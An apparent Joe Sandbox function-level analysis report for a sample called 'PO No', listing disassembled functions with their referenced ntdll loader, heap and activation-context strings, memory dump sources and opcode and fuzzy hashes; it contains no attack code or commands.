                                                            Function 00FD096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00FD2DF0: LdrInitializeThunk.NTDLL ref: 00FD2DFA
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0BA3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0BB6
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0D60
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0D74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                            • String ID:
                                                            • API String ID: 1404860816-0
                                                            • Opcode ID: 612a0ff6a573247e83ad59de673f80185c91dc318ebff129f00768602470df75
                                                            • Instruction ID: fcaf03c86c9a068b9041355eb609f09f467636c8493e91f5e4ef831ef1651c29
                                                            • Opcode Fuzzy Hash: 612a0ff6a573247e83ad59de673f80185c91dc318ebff129f00768602470df75
                                                            • Instruction Fuzzy Hash: 7B427B71900715DFDB61CF68C881BAAB7F5BF04314F1845AAE989DB342DB70AA84DF60
                                                            Function 01014F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                            • API String ID: 0-2518169356
                                                            • Opcode ID: eff8733bd85ae3c5d843053193b18e07fd87ba61cfb444af67f0cdd5bc8aa708
                                                            • Instruction ID: 473b9ba72c44380022051c57c6cd43a7213ae452bc4df7a23874c593ea0ca08d
                                                            • Opcode Fuzzy Hash: eff8733bd85ae3c5d843053193b18e07fd87ba61cfb444af67f0cdd5bc8aa708
                                                            • Instruction Fuzzy Hash: 7E91C1729006198BCB22CF9CCC81AAEB7F1EF89310F1941A9E894EB355D739D901CB91
                                                            Function 00FA70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                            • API String ID: 0-3178619729
                                                            • Opcode ID: efaac196e7fdb040e481d1a9677a75e742eb9529e54ccaf2344b0fb1f2f700ea
                                                            • Instruction ID: e62a8e5d5dded55c13b5e1c114933a7e359e75278a740be74c55c64fc079174f
                                                            • Opcode Fuzzy Hash: efaac196e7fdb040e481d1a9677a75e742eb9529e54ccaf2344b0fb1f2f700ea
                                                            • Instruction Fuzzy Hash: 3A13A0B0E04255DFDB24DF68C880BA9BBF1BF4A314F148169D845AB381DB74AD46EF90
                                                            Function 00FAA840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 00FF7D56
                                                            • SsHd, xrefs: 00FAA885
                                                            • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 00FF7D39
                                                            • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 00FF7D03
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                            • API String ID: 0-2905229100
                                                            • Opcode ID: a45a889b9ffdf26244ef07ebfac3d292b5ef164dc141aef85258584ebe977ba5
                                                            • Instruction ID: 8f524381dc633a1dfbc9f9766a289493282833336b7846c18bc22115e4e47bb2
                                                            • Opcode Fuzzy Hash: a45a889b9ffdf26244ef07ebfac3d292b5ef164dc141aef85258584ebe977ba5
                                                            • Instruction Fuzzy Hash: E5D1AF71E00219DBCB25DFA8C8C06EEB7B1EF49310F19406AE945AB355D3359C45EBA2
                                                            Function 00F9A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                            • API String ID: 0-379654539
                                                            • Opcode ID: 0c1cba55057eb49f7a008d93b0bf4e3bfeb650c69915ce3e8a320b30b784062c
                                                            • Instruction ID: d1702b654534be7d566c511bc18166ba44e93ed7e7c245373436b9254e5af93b
                                                            • Opcode Fuzzy Hash: 0c1cba55057eb49f7a008d93b0bf4e3bfeb650c69915ce3e8a320b30b784062c
                                                            • Instruction Fuzzy Hash: 71C1AD71608386CFEB11CF18C444B6AB7E4FF84714F14886AF9958B261E778C945EB93
                                                            Function 00FC8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • @, xrefs: 00FC8591
                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00FC855E
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FC8421
                                                            • LdrpInitializeProcess, xrefs: 00FC8422
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1918872054
                                                            • Opcode ID: 6ea49a61d8a723deb54d1e7a761be9dbfd85336f3079779aec006577e32b4b0c
                                                            • Instruction ID: 840d31eb3961a4f80c272c6d35ae849e94614ff23e8af1b8c4fe6e88b595f8b7
                                                            • Opcode Fuzzy Hash: 6ea49a61d8a723deb54d1e7a761be9dbfd85336f3079779aec006577e32b4b0c
                                                            • Instruction Fuzzy Hash: F291AC71508345AFE721DF20CD42FABB7E8BF88794F44092EFA8492141E778D905EB62
                                                            Function 00FA0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • HEAP: , xrefs: 00FF54E0, 00FF55A1
                                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00FF54ED
                                                            • HEAP[%wZ]: , xrefs: 00FF54D1, 00FF5592
                                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00FF55AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                            • API String ID: 0-1657114761
                                                            • Opcode ID: 1e73c8426ba080583e471c43b87842b2585d93273dcf85b8f0fbaf7068a64e51
                                                            • Instruction ID: 0e137612514befb779578fdf72e08830c69d2a27f51202d7b0a3579e7b1ddfb2
                                                            • Opcode Fuzzy Hash: 1e73c8426ba080583e471c43b87842b2585d93273dcf85b8f0fbaf7068a64e51
                                                            • Instruction Fuzzy Hash: 5FA114B1A0060A9FD724DF64D880BBABBF1BF16720F188569E5868B281DB34F844F751
                                                            Function 00FC273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010021D9, 010022B1
                                                            • SXS: %s() passed the empty activation context, xrefs: 010021DE
                                                            • .Local, xrefs: 00FC28D8
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010022B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                            • API String ID: 0-1239276146
                                                            • Opcode ID: 424e14a9b9165001b447a8600466935e8e77d5e6d09035611eadf701c9b58c31
                                                            • Instruction ID: b654ec8c95a2ccf9e8120be8a49d68b0216eb6b9fb70855edccc5acf6a01c1f3
                                                            • Opcode Fuzzy Hash: 424e14a9b9165001b447a8600466935e8e77d5e6d09035611eadf701c9b58c31
                                                            • Instruction Fuzzy Hash: 82A1A031D0022A9BDB65CF54CD89BA9B3B5FF58314F2541EED848A7291D7309E80EF91
                                                            Function 00F128C0 Relevance: 5.2, Strings: 4, Instructions: 248COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: VUUU$^$gfff$gfff
                                                            • API String ID: 0-1542983064
                                                            • Opcode ID: 0db0fa7835315dcf6d1feaec4ce2b9420d6df54f2c7e66f4b3a323d9b25bb996
                                                            • Instruction ID: 0ee41a96e89e9e2c2ba8705041f2962b74e8aef2c6351cefd6fde3b8132f7532
                                                            • Opcode Fuzzy Hash: 0db0fa7835315dcf6d1feaec4ce2b9420d6df54f2c7e66f4b3a323d9b25bb996
                                                            • Instruction Fuzzy Hash: 89615A72F001190BEB68C9DDECC07FAB359EBD0335F18413AE905CF281E525ADA5A2D0
                                                            Function 00FC4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0100342A
                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01003456
                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01003437
                                                            • RtlDeactivateActivationContext, xrefs: 01003425, 01003432, 01003451
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                            • API String ID: 0-1245972979
                                                            • Opcode ID: 35b5bf82a4bbdccea2fcc8053350ebb38d583a939ec0cca6ebbee593e687d105
                                                            • Instruction ID: fc2c4b774430ce4148068cda859c14f6c9631c9ac4d89412ef4b82fa81554f9d
                                                            • Opcode Fuzzy Hash: 35b5bf82a4bbdccea2fcc8053350ebb38d583a939ec0cca6ebbee593e687d105
                                                            • Instruction Fuzzy Hash: 31611236A44A129FE723CF18C952F2AB7E1AF80B60F15855DE8959F291CB74FC00DB91
                                                            Function 00F964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FF0FE5
                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FF1028
                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FF10AE
                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FF106B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                            • API String ID: 0-1468400865
                                                            • Opcode ID: 7f6db7943b79f50195f5bb2fc1090ff2cc177990ca87ccdcc2a073309dbc6072
                                                            • Instruction ID: 6f6c0f3eb271b920adac315546179bc1a8524ffefd45c5003a72a94b51d0382b
                                                            • Opcode Fuzzy Hash: 7f6db7943b79f50195f5bb2fc1090ff2cc177990ca87ccdcc2a073309dbc6072
                                                            • Instruction Fuzzy Hash: 827103B19043049FDB20EF14C885F9B7FA8EF54764F540469F9488B286D778D988EBD2
                                                            Function 00FB245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • apphelp.dll, xrefs: 00FB2462
                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FFA992
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FFA9A2
                                                            • LdrpDynamicShimModule, xrefs: 00FFA998
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-176724104
                                                            • Opcode ID: 5332337af71bc4e90ee3e0a6ae7125c359d9c520861adff08dd30e627d1daf8e
                                                            • Instruction ID: 0da66aa6784865aa2b7ac46cd2748f4f9deb6ffbf1c138578d2d5bdffef61d4d
                                                            • Opcode Fuzzy Hash: 5332337af71bc4e90ee3e0a6ae7125c359d9c520861adff08dd30e627d1daf8e
                                                            • Instruction Fuzzy Hash: 84314AB2A10205EBDB30EF59C881EBD77B4FF84B24F160029F9846B265C7B99D41EB41
                                                            Function 00FA29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • HEAP: , xrefs: 00FA3264
                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00FA327D
                                                            • HEAP[%wZ]: , xrefs: 00FA3255
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                            • API String ID: 0-617086771
                                                            • Opcode ID: 60742ac75185d11116849603346cf5a31d1f88d02951985e6fb4217b05584755
                                                            • Instruction ID: e278714c77de40e016443b273c7c9eeaecea2ca9fbb708f8d19b3ba709df599b
                                                            • Opcode Fuzzy Hash: 60742ac75185d11116849603346cf5a31d1f88d02951985e6fb4217b05584755
                                                            • Instruction Fuzzy Hash: 9F92CEB1E042499FDB25CF68C440BADBBF1FF4A314F188069E889AB351D735AA41EF50
                                                            Function 010202C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                            • API String ID: 0-1670051934
                                                            • Opcode ID: 860d2db1873cb084b560b5503bbaeba8aff53723e837beb366b8294dcb8fda8f
                                                            • Instruction ID: 8c52b5e79e7f72b6f34e8a0324cd94c6c6ff316c305dd402261f4eb10f9e6d2b
                                                            • Opcode Fuzzy Hash: 860d2db1873cb084b560b5503bbaeba8aff53723e837beb366b8294dcb8fda8f
                                                            • Instruction Fuzzy Hash: 38226D72A047128FE764CF2DC89562BBBE1BBC8310F24892EF2DA87658D771E544CB41
                                                            Function 00FA0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-4253913091
                                                            • Opcode ID: cb182e541cc1c9fe5a4cdc6dfaffbb3b34bc30f5b87fb1ce0a4dd3808af19ee1
                                                            • Instruction ID: b88a182b56f5a3d6c6825e198f150eb61abcf5cf283dd110a98009e5163649d3
                                                            • Opcode Fuzzy Hash: cb182e541cc1c9fe5a4cdc6dfaffbb3b34bc30f5b87fb1ce0a4dd3808af19ee1
                                                            • Instruction Fuzzy Hash: 9DF1CEB1A00609DFDB14CF68D880B7AB7B5FF46710F248168E6469B391DB34ED41EB90
                                                            Function 00F91460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • HEAP: , xrefs: 00F91596
                                                            • HEAP[%wZ]: , xrefs: 00F91712
                                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00F91728
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                            • API String ID: 0-3178619729
                                                            • Opcode ID: d5afa7ec12e78debdd16a3d47eaaa701a0ea957fb7b30800cf4d6556fbc36ad3
                                                            • Instruction ID: d496b782e7c1b0d215426e0b025fabfd4d92fc51c6a9612150ef32504b9f8dbd
                                                            • Opcode Fuzzy Hash: d5afa7ec12e78debdd16a3d47eaaa701a0ea957fb7b30800cf4d6556fbc36ad3
                                                            • Instruction Fuzzy Hash: 5EE10331A042469FEB29CF69C451BBABBF1BF89310F18856DE4D6CB245D734E844EB50
                                                            Function 00FB6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $@
                                                            • API String ID: 0-1077428164
                                                            • Opcode ID: 390d781ffc38b5a17107552523f78bef4f417cf121e7234923007d6d15667e45
                                                            • Instruction ID: c14bd70a4edc7fe2ab383c75919029815d721f91f2b6f8117db628b7a19513fa
                                                            • Opcode Fuzzy Hash: 390d781ffc38b5a17107552523f78bef4f417cf121e7234923007d6d15667e45
                                                            • Instruction Fuzzy Hash: A4C29972A083559FDB24DF25C881BABBBE5AFC8354F14892DE989C7250D734D804EF92
                                                            Function 00F8A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                            • API String ID: 0-2779062949
                                                            • Opcode ID: 50d45c186074bcc6d01349924f3d2a6e8fd95af6dd87d872186f8e6a62548260
                                                            • Instruction ID: f1d29c80cf358d562659a4d2117402a57d790fccf59734c2c1026999861d3222
                                                            • Opcode Fuzzy Hash: 50d45c186074bcc6d01349924f3d2a6e8fd95af6dd87d872186f8e6a62548260
                                                            • Instruction Fuzzy Hash: 02A17D71D112299BDB31EF25CC89BEAB7B8EF44710F1041EAE908A7250D7359E85DF90
                                                            Function 00FB0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrpCheckModule, xrefs: 00FFA117
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FFA121
                                                            • Failed to allocated memory for shimmed module list, xrefs: 00FFA10F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-161242083
                                                            • Opcode ID: 377e4dd998f4f37979a8202122574210da44cb0d7b8d1535d5fa5c50ac85ff1b
                                                            • Instruction ID: deef07e6e16841bcd049574a23eb70617fe9d38759a2564e7a3f74c48d06cd48
                                                            • Opcode Fuzzy Hash: 377e4dd998f4f37979a8202122574210da44cb0d7b8d1535d5fa5c50ac85ff1b
                                                            • Instruction Fuzzy Hash: 3A71E1B1E002059BCB24DF69C881ABEB7B0FF44714F154129E885DB251EB39AD41EB51
                                                            Function 00FA0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-1334570610
                                                            • Opcode ID: 146d9767f02d535eb6d71b6f683e0241084402cd6253851bf287c9a523de8e19
                                                            • Instruction ID: 637692522340397741fa3a3397f8e07d655a453772260859876b4d59f8b1ebd2
                                                            • Opcode Fuzzy Hash: 146d9767f02d535eb6d71b6f683e0241084402cd6253851bf287c9a523de8e19
                                                            • Instruction Fuzzy Hash: BD610571600305DFDB28CF28D540B6ABBE2FF46754F148459E585CF292CB74E841EB91
                                                            Function 00FCC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 010082DE
                                                            • Failed to reallocate the system dirs string !, xrefs: 010082D7
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 010082E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1783798831
                                                            • Opcode ID: 099ddab9f4546539ed40276f877360e5f7d3053b347cbf570d681aecfa8f0080
                                                            • Instruction ID: c4c8c4f0bd06cb9e6d109a475ca9422846222b830f99e56602ee8d4a35e2d2f6
                                                            • Opcode Fuzzy Hash: 099ddab9f4546539ed40276f877360e5f7d3053b347cbf570d681aecfa8f0080
                                                            • Instruction Fuzzy Hash: 8041D1B1908301ABD721EB68DD46B5B77E8EF88710F04452AF9C8D7291E779D800AB92
                                                            Function 0104C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0104C1C5
                                                            • PreferredUILanguages, xrefs: 0104C212
                                                            • @, xrefs: 0104C1F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                            • API String ID: 0-2968386058
                                                            • Opcode ID: 549b2e1f35e4a6b6c28e3af0e3a70e8c69a20bafba472667dd346486d48895a0
                                                            • Instruction ID: 68bec94f537600ada935a4ee31df1a1918c88b8ca83d17046a03871a5eaef589
                                                            • Opcode Fuzzy Hash: 549b2e1f35e4a6b6c28e3af0e3a70e8c69a20bafba472667dd346486d48895a0
                                                            • Instruction Fuzzy Hash: 954166B1E01209EBEB51DED8CE81FEEB7F9AB54700F14407AE645B7240E7B49E449B50
                                                            Function 01024144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                            • API String ID: 0-1373925480
                                                            • Opcode ID: f255ae004f7f565b60c779fe537c4b058c5eac00bd8543073d10b5f345ac9536
                                                            • Instruction ID: 251b60eda7646e233f09f8e0cddd528cce2bea09e1629a3eec15e2157ea16925
                                                            • Opcode Fuzzy Hash: f255ae004f7f565b60c779fe537c4b058c5eac00bd8543073d10b5f345ac9536
                                                            • Instruction Fuzzy Hash: 9D41E571A04268CBEB22DBD9C840BADBBF4EF56340F24049AE981EB782D7748905CB11
                                                            Function 01014755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01014899
                                                            • LdrpCheckRedirection, xrefs: 0101488F
                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01014888
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                            • API String ID: 0-3154609507
                                                            • Opcode ID: 9f5cf4db4dbf223d24c2fba6bf8678be4f152e77e55e51e269d3edfc4d77f1fc
